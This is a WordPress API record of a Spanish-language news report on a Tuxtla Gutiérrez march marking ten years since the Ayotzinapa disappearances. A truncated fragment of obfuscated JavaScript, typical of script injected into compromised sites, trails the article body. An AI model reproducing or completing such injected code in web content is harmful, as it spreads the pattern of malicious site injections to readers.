{"id":18080,"date":"2024-09-27T03:26:08","date_gmt":"2024-09-27T03:26:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18080"},"modified":"2024-09-27T03:26:09","modified_gmt":"2024-09-27T03:26:09","slug":"marchan-normalistas-de-todo-el-estado-en-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18080","title":{"rendered":"Marchan normalistas de todo el estado en Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727407498946-1024x766.jpg\" alt=\"\" class=\"wp-image-18081\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727407498946-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727407498946-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727407498946-768x575.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727407498946.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jaime Mart\u00ednez.<\/p>\n\n\n\n<p>26 de septiembre del 2024. Tuxtla Guti\u00e9rrez.-Este jueves normalistas de diferentes regiones del estado realizaron una marcha en Tuxtla Guti\u00e9rrez para conmemorar el d\u00e9cimo aniversario de la desaparici\u00f3n de los 43 normalistas de Ayotzinapa Guerrero.<\/p>\n\n\n\n<p>Normalistas de diversas escuelas de la regi\u00f3n y maestros de la secci\u00f3n 7 del Sindicato Nacional de Trabajadores de la Educaci\u00f3n (SNTE)- Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (CNTE) marcharon para exigir justicia por los 43 estudiantes de la escuela normal Ra\u00fal Isidro Burgos, de Ayotzinapa Guerrero a 10 a\u00f1os de su desaparici\u00f3n.<\/p>\n\n\n\n<p>El secretario de organizaci\u00f3n de la secci\u00f3n 7 del SNTE, Gabriel D\u00edaz Ord\u00f3\u00f1ez , afirm\u00f3 que esta marcha forma parte de las acciones en conmemoraci\u00f3n del 10 aniversario de la desaparici\u00f3n de los estudiantes, a trav\u00e9s de la cual alzan la voz para exigir al gobierno federal justicia y todo el peso de la ley contra los involucrados del caso de los estudiantes de Ayotzinapa.<\/p>\n\n\n\n<p>Dijo que si el gobierno de la cuarta transformaci\u00f3n que encabeza Andr\u00e9s Manuel L\u00f3pez Obrador, se comprometi\u00f3 a dar respuesta a los padres de familia, pero solo los enga\u00f1\u00f3, ya que a d\u00edas de que concluya su administraci\u00f3n nunca se conoci\u00f3 la verdad.<\/p>\n\n\n\n<p>&#8220;En estas acciones ya no exigimos la presentaci\u00f3n de los 43 j\u00f3venes normalistas, sino todo el peso de la justicia en contra de los responsables, donde el gobierno de la cuarta transformaci\u00f3n solo enga\u00f1\u00f3 a los padres porque nunca se lleg\u00f3 a conocer la verdad&#8221;, abund\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jaime Mart\u00ednez. 26 de septiembre del 2024. Tuxtla Guti\u00e9rrez.-Este jueves normalistas de diferentes regiones del estado realizaron una marcha en Tuxtla Guti\u00e9rrez para conmemorar el d\u00e9cimo aniversario de la desaparici\u00f3n de los 43 normalistas de Ayotzinapa Guerrero. Normalistas de diversas escuelas de la regi\u00f3n y maestros de la secci\u00f3n 7 del Sindicato Nacional de Trabajadores &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18081,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-18080","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18080","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18080"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18080\/revisions"}],"predecessor-version":[{"id":18082,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18080\/revisions\/18082"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18081"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18080"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18080"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18080"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}